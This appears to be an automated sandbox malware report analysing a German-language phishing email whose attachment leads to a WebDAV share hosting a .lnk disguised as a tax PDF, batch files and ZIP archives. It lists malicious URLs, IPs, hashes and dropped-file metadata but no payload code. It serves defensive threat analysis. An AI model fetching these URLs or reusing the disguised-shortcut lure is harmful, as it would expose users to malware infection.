                      http://burrkeklprinting.tech:4098/favicon.icotrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://burrkeklprinting.tech:4098/startuppp.batfalse
                        		unknown
                        http://burrkeklprinting.tech:4098/:dir_browser/script.jstrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://burrkeklprinting.tech:4098/FTSP.ziptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://burrkeklprinting.tech:4098/E_TAX_DOC/false
                          		unknown
                          http://burrkeklprinting.tech:4098/:dir_browser/favicon.icotrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://burrkeklprinting.tech:4098/kyvbsa.pdffalse
                            		unknown
                            http://burrkeklprinting.tech:4098/false
                              		unknown
                              http://burrkeklprinting.tech:4098/E_TAX_DOC/E_TAX_DOC438093562789873345672_pdf.lnktrue
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              142.250.185.78
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              142.250.185.228
                              		www.google.comUnited States
                              		15169GOOGLEUSfalse
                              20.189.173.8
                              		unknownUnited States
                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              184.28.88.176
                              		unknownUnited States
                              		16625AKAMAI-ASUSfalse
                              142.250.186.174
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              52.109.89.119
                              		unknownUnited States
                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              142.250.185.227
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              52.22.41.97
                              		unknownUnited States
                              		14618AMAZON-AESUSfalse
                              52.109.68.129
                              		unknownUnited States
                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              142.251.168.84
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              162.159.61.3
                              		chrome.cloudflare-dns.comUnited States
                              		13335CLOUDFLARENETUSfalse
                              52.109.32.97
                              		unknownUnited States
                              		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              23.41.168.139
                              		unknownUnited States
                              		6461ZAYO-6461USfalse
                              52.6.155.20
                              		unknownUnited States
                              		14618AMAZON-AESUSfalse
                              2.22.242.130
                              		unknownEuropean Union
                              		20940AKAMAI-ASN1EUfalse
                              52.113.194.132
                              		unknownUnited States
                              		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                              104.16.231.132
                              		string-neural-inspiration-polo.trycloudflare.comUnited States
                              		13335CLOUDFLARENETUStrue
                              239.255.255.250
                              		unknownReserved
                              		unknownunknownfalse
                              2.16.241.13
                              		unknownEuropean Union
                              		20940AKAMAI-ASN1EUfalse
                              116.203.169.52
                              		burrkeklprinting.techGermany
                              		24940HETZNER-ASDEtrue
                              184.28.90.27
                              		unknownUnited States
                              		16625AKAMAI-ASUSfalse
                              172.217.16.195
                              		unknownUnited States
                              		15169GOOGLEUSfalse

                              Private

                              IP
                              192.168.2.16
                              127.0.0.1

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1484680
                              Start date and time:2024-07-30 15:46:45 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:40
                              Number of new started drivers analysed:1
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Sample name:EXTERN Zahlungsbest#U00e4tigung.msg
                              renamed because original name is a hash value
                              Original Sample Name:EXTERN Zahlungsbesttigung.msg
                              Detection:MAL
                              Classification:mal96.troj.spyw.expl.evad.winMSG@65/250@13/146
                              Cookbook Comments:
                              • Found application associated with file extension: .msg

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 52.109.32.97
                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, wu-b-net.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • Report size getting too big, too many NtSetValueKey calls found.
                              • VT rate limit hit for: chrome.cloudflare-dns.com
                              • VT rate limit hit for: file:///C:/Users/user/Downloads/downloaded.pdf
                              • VT rate limit hit for: http://burrkeklprinting.tech:4098/FTSP.zip

                              LLM Input / Output

                              InputOutput
                              URL: e-Mail Model: gpt-4o
                              ```json
{
  "riskscore": 8,
  "brand_impersonated": "Unknown",
  "reasons": "The email contains several indicators of a phishing attempt. Firstly, it uses a generic greeting and lacks personalization, which is common in phishing emails. Secondly, the email creates a sense of urgency by mentioning an attached invoice, which could prompt the recipient to open the attachment without verifying its authenticity. Thirdly, the email is written in German, which might not be the recipient's primary language, adding to the confusion. Lastly, there is no clear indication of the sender's identity or contact information, which is suspicious. The combination of these factors suggests a high risk of phishing."
}
                              URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/2SB9MLRC/Rechnung%20Nr.%2017735360.html Model: Perplexity: mixtral-8x7b-instruct
                              {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The title 'E_SCAN_DOC' and text 'E SCAN DOC' do not contain a login form requesting sensitive information.","There is no sense of urgency or interest created in the text.","No CAPTCHA or anti-robot detection mechanism was found on the webpage."]}
                              Title: E_SCAN_DOC OCR: E SCAN DOC
                              URL: http://burrkeklprinting.tech:4098/ Model: Perplexity: mixtral-8x7b-instruct
                              {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form as there is no explicit request for sensitive information such as passwords, email addresses, usernames, phone numbers or credit card numbers (CVV).","The text of the webpage does not create a sense of urgency as it is just an index page with a list of files and directories.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
                              Title: WsgiDAV - Index of / OCR: Index of I Authenticated user: 'anonymous", realm: 7" v access: read-write_ Size Last modified Name Type Directory E SCAN Tue, 224 Jul Directory' E TAX DOC 2024 OXOS. zip -File 48, 2a1, 681 Bytes Tue, 2024 12. 56 FTSP . zip Jul -Fila 47, 545, Bytes 2024 22. jiopdssa . Ink LUK-Fi1 1,616 Bytes Sun, 28 2024 kyvbsa PCF-Fi12 Jul Bytes Sun, 28 2024 new. bat BAT -File 23, 266 Bytes Tue, 224 startuppp. bet SAT -File 7,178 Bytes 2024 &gIDAW4.3.O - Tue, 30 2024 GMT
                              URL: http://burrkeklprinting.tech:4098/E_TAX_DOC/ Model: Perplexity: mixtral-8x7b-instruct
                              {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there are no explicit requests for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text of the webpage does not create a sense of urgency, as it only contains a directory listing and no calls to action or time-sensitive language.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
                              Title: WsgiDAV - Index of /E_TAX_DOC/ OCR: Index of IE TAX DOCI 'anonymous", realm: 7" v access: read-write_ Authenticated user: Size Last modified Neme Type Directory TAX df.lnk LUK-Fi1e Jul 2024 ENT Bytes Tue, &gIDAW4.3.O - Tue, 30 Jul 2024 13:48 e GMT

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Network\Downloader\edb.log

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.8167914064379246
                              Encrypted:false
                              SSDEEP:
                              MD5:47997DC3627D042AC9B7C85C8A5F975B
                              SHA1:B20BFD5171FC63D189CBE57C19DA634752BF8454
                              SHA-256:80967133D7158BC9E9DA8242C79F27ACEEF42EA7A37117FC974FF25E6913F09E
                              SHA-512:CF770570A36E58E885B3C24BF0E97B38365506B4A77FDB1A39C9B665165A1386864364A2B80C003814961B5A60C63E747F88267763B4CF459896A1183EAA2960
                              Malicious:false
                              Reputation:unknown
                              Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16384
                              Entropy (8bit):0.07984412920876408
                              Encrypted:false
                              SSDEEP:
                              MD5:A50DC0A7D11B3753ED2461A3B2FA0AA8
                              SHA1:476B62A0987ADA630C96AD67B0BD9E8CCB58B3AA
                              SHA-256:3FE17628D2169BBA39F50EAF154CD9E85614EC0CD5CD599753A94127B4634BE4
                              SHA-512:E1ECCB8494C54DB762AF6F15C697CFEB3F2AC57301F6A24F799B05BAE33DD738ABF2631A79DF06D194158C459289421A29841959BC68C184F732FACCE75C60B0
                              Malicious:false
                              Reputation:unknown
                              Preview:...k.....................................;...{.../...|... ...{........... ...{... ...{..#.#.. ...{.|..................5./...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):290
                              Entropy (8bit):5.151464016094181
                              Encrypted:false
                              SSDEEP:
                              MD5:D9DBCEA643DF3D1E30CCC4F6354FAB81
                              SHA1:47A7023A0365687DA10E58B1AFBE1992FC631045
                              SHA-256:9D100F6F3EDBD1148BCA943945CADAB7FC2C3A50E27628D320C70803C3883A8A
                              SHA-512:C9B5383E944F29547C27ECBF5DCFD1A57FE7CDEC046EC9F06D6F9E64BBDC766F393638CB512EED5432AE5E1D7DACD48C72A7F79C15377D308B2AC7F0912D2CD4
                              Malicious:false
                              Reputation:unknown
                              Preview:2024/07/30-09:49:00.308 1d74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/07/30-09:49:00.310 1d74 Recovering log #3.2024/07/30-09:49:00.311 1d74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):334
                              Entropy (8bit):5.116213621922532
                              Encrypted:false
                              SSDEEP:
                              MD5:E75C4373B3B297CF9588BA56D62391D8
                              SHA1:73723AE24CC589ED36FDA40905730C7DF29D6A5F
                              SHA-256:4D1EFB7EED7861ECB1D7065F9F8BB240DC00435CFE8B02BD75C1580061194375
                              SHA-512:984B875B4DF547FD03A530F51F15CFA0D3648C25BF5E4566F3F2D72BE446232E09B00E0D22828265438CF37E7009420EF9EDC533668402CAAC149E1C393AB2AC
                              Malicious:false
                              Reputation:unknown
                              Preview:2024/07/30-09:49:00.136 1f30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/07/30-09:49:00.140 1f30 Recovering log #3.2024/07/30-09:49:00.140 1f30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:4C313FE514B5F4E7E89329630909F8DC
                              SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                              SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                              SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                              Malicious:false
                              Reputation:unknown
                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\b1370799-a4a8-48f5-807e-06effb245b42.tmp

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):403
                              Entropy (8bit):4.953858338552356
                              Encrypted:false
                              SSDEEP:
                              MD5:4C313FE514B5F4E7E89329630909F8DC
                              SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                              SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                              SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                              Malicious:false
                              Reputation:unknown
                              Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4099
                              Entropy (8bit):5.230046389429075
                              Encrypted:false
                              SSDEEP:
                              MD5:2E550D871C8502BC7A8B353391BFE06A
                              SHA1:961891FE917EE9132C010E19D0B58F45ABB0EBFB
                              SHA-256:73B5588839520783C990153FA69E43B4B26C092A87EF8FB624D289FFDBF32772
                              SHA-512:8562A728ABF7AA5E615A6F8CA2942706E2D3DD9DAA73D311A94F2AAFD5A29719F4108969210183A59C2298BAB0A5C4629BA1BB17FB874518EFE36A3EC6D891B0
                              Malicious:false
                              Reputation:unknown
                              Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_

                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):322
                              Entropy (8bit):5.147212173036741
                              Encrypted:false
                              SSDEEP:
                              MD5:2EBB381509230BBC90F95DE0CEDD9DF5
                              SHA1:21E8EED635452DBAA7BF07205D1CE1569F175BE6
                              SHA-256:EC4DF040C710E4062E86E41D77F19AF5AE9A49CA9BE07EB481DBEF72AC68CE2B
                              SHA-512:A164DAFB2A2DB5AD30E802465277E5CE6A9A1958838F9ECFBD16EEA1AE8D2E67425B852A0D295F26B7C70418308973DB5E638164B888879A0F1083BFE627DE2D
                              Malicious:false
                              Reputation:unknown
                              Preview:2024/07/30-09:49:00.367 1f30 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/07/30-09:49:00.369 1f30 Recovering log #3.2024/07/30-09:49:00.371 1f30 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                              Category:dropped
                              Size (bytes):57344
                              Entropy (8bit):3.291927920232006
                              Encrypted:false
                              SSDEEP:
                              MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                              SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                              SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                              SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                              Malicious:false
                              Reputation:unknown
                              Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:SQLite Rollback Journal
                              Category:dropped
                              Size (bytes):16928
                              Entropy (8bit):1.215643415962537
                              Encrypted:false
                              SSDEEP:
                              MD5:F68A7786459C48EA3712704D605E0F52
                              SHA1:CC7E6AEB14D72070E23059DC20735367730788B7
                              SHA-256:FE2B1CE760F57EFD4364B7D33D3B1042F22922C4398CCA2E7A4051911A40AA1F
                              SHA-512:BBB2684F96A1450AE7E62D3EFC067254BDD9A3AB6B1C7FBBE1F98C3029FE70FB5653690BF18E5DB30B3CA7827ACEA0F28CCA1CDBCE124809DC9C462817C5A652
                              Malicious:false
                              Reputation:unknown
                              Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                              Category:dropped
                              Size (bytes):71954
                              Entropy (8bit):7.996617769952133
                              Encrypted:true
                              SSDEEP:
                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                              Malicious:false
                              Reputation:unknown
                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):893
                              Entropy (8bit):7.366016576663508
                              Encrypted:false
                              SSDEEP:
                              MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                              SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                              SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                              SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                              Malicious:false
                              Reputation:unknown
                              Preview:0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:modified
                              Size (bytes):328
                              Entropy (8bit):3.144086598890895
                              Encrypted:false
                              SSDEEP:
                              MD5:9AD6E7F91187A8D64CBE8B5E4EFB7FCD
                              SHA1:72A33835B2A46B1D6634F96DDAFBD939291B6D40
                              SHA-256:59A197A464D6B36C8A18FCBA46AB0C3E2BE39341504928A9AAAC73724D86A6AC
                              SHA-512:BE928BC2C8B6199CCC4E2328991BAA20D5994E010F2A254537428B37D13ED1F41D27EDDC3020FFD9793715996B3B3C7E05F54C37082F7BB47AD219037767DF9E
                              Malicious:false
                              Reputation:unknown
                              Preview:p...... ...........R....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):252
                              Entropy (8bit):3.034404395079139
                              Encrypted:false
                              SSDEEP:
                              MD5:5944C88BB8DD79D5AC35F06922B22542
                              SHA1:3D2AF4404620EB538107C6CDE6CD4E38D4A692E2
                              SHA-256:A9E33660493EEA620D956E24859C8EE2002B4F93E9BFE768EB2321A295741FAC
                              SHA-512:2B70F1FFE69F77C3BAB1C58B7FB9C8F380EACF3D5D00091D92D0D453D2D71D2D493F9A742A0B6BDE67913C0261F9A5A19B8DF73374B0FF258D0BE6C8EA1F4B68
                              Malicious:false
                              Reputation:unknown
                              Preview:p...... ....`......?....(....................................................... ........!.M........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.6.0.7.9.b.8.c.0.9.2.9.c.0."...

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7664

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):185099
                              Entropy (8bit):5.182478651346149
                              Encrypted:false
                              SSDEEP:
                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                              Malicious:false
                              Reputation:unknown
                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Reg.FamilyName:Agency FB.StyleName:Regular.MenuName:Agency FB.StyleBits:0.WeightClass:400.WidthClass:3.AngleClass:0.FullName:Agency FB.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB.FileLength:58920.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:AgencyFB-Bold.FamilyName:Agency FB.StyleName:Bold.MenuName:Agency FB.StyleBits:2.WeightClass:700.WidthClass:3.AngleClass:0.FullName:Agency FB Bold.WritingScript:Roman.hasSVG:no.hasCOLR:no.VariableFontType:NonVariableFont.WinName:Agency FB Bold.FileLength:60656.NameArray:0,Win,1,Agency FB.NameArray:0,Mac,4,Agency FB Bold.NameArray:0,Win,1,Agency FB.%EndFont..%BeginFont.Handler:WinTTHandler.FontType:TrueType.FontName:Algerian.FamilyName:Algerian.StyleName:Regular.MenuName:Algerian.StyleBits:0.We

                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                              Download File
                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                              File Type:PostScript document text
                              Category:dropped
                              Size (bytes):0
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:
                              MD5:94185C5850C26B3C6FC24ABC385CDA58
                              SHA1:42F042285037B0C35BC4226D387F88C770AB5CAA
                              SHA-256:1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
                              SHA-512:652657C00DD6AED1A132E1DFD0B97B8DF233CDC257DA8F75AC9F2428F2F7715186EA8B3B24F8350D409CC3D49AFDD36E904B077E28B4AD3E4D08B4DBD5714344
                              Malicious:false
                              Reputation:unknown
